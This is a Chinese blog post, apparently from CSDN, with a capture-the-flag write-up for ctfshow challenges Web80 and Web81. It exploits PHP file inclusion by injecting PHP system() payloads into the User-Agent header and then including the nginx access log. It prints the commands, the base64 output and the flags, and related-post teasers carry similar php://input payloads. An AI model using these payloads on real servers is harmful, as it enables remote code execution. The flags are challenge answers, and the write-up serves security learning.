ctfshow 日志包含Web80-81

最新推荐文章于 2024-07-13 15:12:45 发布

墨言ink

最新推荐文章于 2024-07-13 15:12:45 发布

阅读量6.2k

点赞数 2

文章标签： web安全

本文链接：https://blog.csdn.net/m0_62584974/article/details/124221932

版权

2022/4/16

题目过滤了php和data，我们这次要用日志文件包含

先抓包

nginx日志的默认路径为/var/log/nginx.

ssh日志的默认路径为/var/log/auth.log

SSH服务如果开启了日志记录功能，会将SSH的连接日志记录到SSH日志文件中（题目是nginx日志）日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述

现在要将恶意代码写入日志文件

/?file=/var/log/nginx/access.log

<?php system(ls); ?>

得到fl0g.php

在User-Agent中输入

<?php system('base64 fl0g.php');?>

得到flag的base64编码

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMg

QERhdGU6ICAgMjAyMC0wOS0xNiAxMToyNDozNw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhh

DQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTE6MjU6MDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s4Mzc4ZGVhZC1kYzQxLTRmNDctYTY5ZS01MmVkZDY1MjEwZjd9Ijs=

解码后得到

ctfshow{8378dead-dc41-4f47-a69e-52edd65210f7}

Web81

多过滤了：

/?file=/var/log/nginx/access.log

<?php system(ls); ?>

在User-Agent中输入

<?php system('base64 fl0g.php');?>

ctfshow{95544252-d2bb-4a39-96f8-26d34164996e}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

墨言ink

关注关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

CTFshow 文件包含 web80

Kradress的博客

12-08

920

目录源码思路题解总结源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){

ctfshow-WEB-web4

snowlyzz的博客

05-15

965

第一次玩ctfshow 之前都是玩的buu 进入题目是一个文件包含漏洞,让我们get传参先是直接读取flag.php试试？url =flag.php emmm，。。好像过滤了，试一下，伪协议读取flag.php文件 ?url=php://filter/read=convert.base64-encode/resource=flag.php emm还是被过滤了。那试一下从其他地方传shell 本来到这已经没思路了，看了下别人的wp才恍然大悟，果然还是我太菜了呜呜..

参与评论您还未登录，请先登录后发表或查看评论

ctfshow-web80

m0_73303597的博客

01-04

652

自用

CTF文件包含篇与 php文件包含

最新发布

2301_81556781的博客

07-13

789

phpMyAdmin是开源的MYSQL数据库管理工具 4.8.0~4.8.1index.php界面存在文件包含功能,代码分析进行绕过可实现漏洞利用。

ctfshow web80-88

weixin_58519918的博客

04-19

3717

web（80）构建/?file=Php://input post: <?php system("tac fl0g.php")?>【php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。】因为我在网上看大部分都使用burp来解决这个题目，然后我的burp他在虚拟机里面一直没有落实在本机

ctfshow-web80(文件包含)

m0_62094846的博客

01-13

1891

<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){ $file = $_G..

php文件包含-CTFshow-web80

读万卷书，行万里路。

07-26

597

0 前言前面我通过 2 个 CTF 题目来讲解了各种协议在文件包含时的简单用法。这篇文章主要是对 web80 做个简要的分析。 1 解题思路在 web79 中只过滤了 php，而在 web80 中过滤了 php 和 data。两个题都是使用 str_replace 进行过滤，所以 web80 的思路和 web79 是一样的。利用大小写绕过 str_replace 函数。（经过测试data 协议无法使用 DATA 绕过。php 伪协议则只能使用 php://input 协议，不能使用 php://fi

CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$

03-04

在CTF（Capture The Flag）比赛中，参赛者通常需要解决各种安全挑战，包括Web漏洞利用、密码学、逆向工程等。这里的"菜狗杯"可能是指比赛的昵称或名称，暗示这是一个初级到中级难度的竞赛，适合新手和进阶者参与。 ...

ctfshow web78-web81文件包含漏洞 wp

qq_56158055的博客

01-16

4239

事先声明，本文只用来学习交流，不参与以任何商业形式的活动。本文不会出现flag。 web78 啥都没过滤，直接用php伪协议查看flag.php 解码得出flag web79 通过替换函数，将php换成了？？？，可以换一个php的伪协议绕过，用data伪协议 web80 这里把data也给过滤了，所有换一个伪协议，用input伪协议然后查看f10g.php就能得到flag web81 这下把:这过滤了，伪协议是用不...

-------已搬运------CTFSHOW---WEB AK赛 -- 包含日志 ---sql注入 ---- xxe ----

Zero_Adam的博客

04-29

786

目录：web0_签到_观己一、自己做：二、学到的&&不足：web1_观宇一、自己做：二、学到的：三、学习WP：web2_观星00000+一、自己做：三、看WP： web0_签到_观己一、自己做：吐槽一句，ctfshow 的题就是考知识点！！，一点拖泥带水的。赞一个！！！ <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ d

ctfshow-web80、81

m0_73590931的博客

08-11

454

然后，代码使用str_replace()函数对file变量进行两次替换操作。第一次替换将file中的php字符串替换为?，第二次替换将file中的data字符串替换为?首先，代码使用isset()函数检查是否存在名为'file'的GET参数。发现与刚刚一样都是user-agent，那还是在user-agent中插入一句话木马，后续做法与web80一样。最后，代码使用include()函数来包含$file变量所代表的文件。意思是将file中的:字符串替换为?看网页信息，发现是nginx服务器。

CTFshow 文件包含 web81

Kradress的博客

12-08

311

目录源码思路题解总结源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 15:51:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){

ctfshow web3 web4--服务器日志文件包含

Dream'

10-18

3918

问题描述打开题目发现只有一句php语句，看到include,考虑文件包含漏洞问题解决在网上逛了一圈，发现大佬们都是用php伪协议来做这道题，我考虑可不可以使用服务器日志来进行文件包含。先来看一下网站是什么服务器。在网上查到nginx服务器日志目录为/var/log/nginx/access.log，查看一下发现可以包含，我们想到可以在日志中插入php一句话木马，然后使用蚁剑或者菜刀连接使用burp抓包，修改referer 写入一句话木马，使用a...

《CTFshow-Web入门》08. Web 71~80

学习学习学习......

05-05

2129

eval() 利用，ob_end_clean() 绕过，正则绕过、PHP 垃圾回收机制，伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://}，{data://}、一句话木马之 Nginx 日志利用。

CTF---Web---文件包含---07---包含日志

qq_22160557的博客

07-28

2053

文章目录前言一、题目描述二、解题步骤1、判断系统2、访问日志3、linux特殊文件系统（/proc）三、总结前言题目分类： CTF—Web—文件包含—07—包含日志一、题目描述题目：文件包含链接：http://172.16.15.206/stage/6/index.php?file=says.php 提示：成功包含apache访问日志即可拿到key值二、解题步骤 1、判断系统首先，考生需要弄清楚这是一个windows系统还是一个linux系统，如果考生尝试包含win.ini则会提示失败，

[ctfshow web入门]常用姿势801-806

weixin_45751765的博客

04-14

4916

php单引号和双引号包裹的区别

ctf_show笔记篇（web入门---文件包含）

whale_waves的博客

03-02

1178

原：file=php://filter/write=convert.base64-decode/resource=a.php。url转换两次后：####浏览器会先自动url解码一次，第二次则是urldecode。原content=

ctfshow-web入门-文件包含（web78、web79、web80、web81）

Welcome To Myon'Blog !

07-04

1686

中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息，如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候，日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行，其实和 php://input 是一样的，让用户可以控制输入流，当它与文件包含函数结合时，用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?

《CTFshow-Web入门》09. Web 81~90

学习学习学习......

09-01

1643

include() 利用，一句话木马之 Nginx 日志利用、条件竞争写入木马、file_put_contents() 利用，伪协议（php://filter/）、伪协议（data://）、PHP 特性之 intval()。

ctfshow-web-web红包题

07-14

ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站，要求我们通过安全漏洞来获得网站的红包。首先，我们可以检查网站的源代码，寻找可能存在的漏洞。在网站的前端页面中，...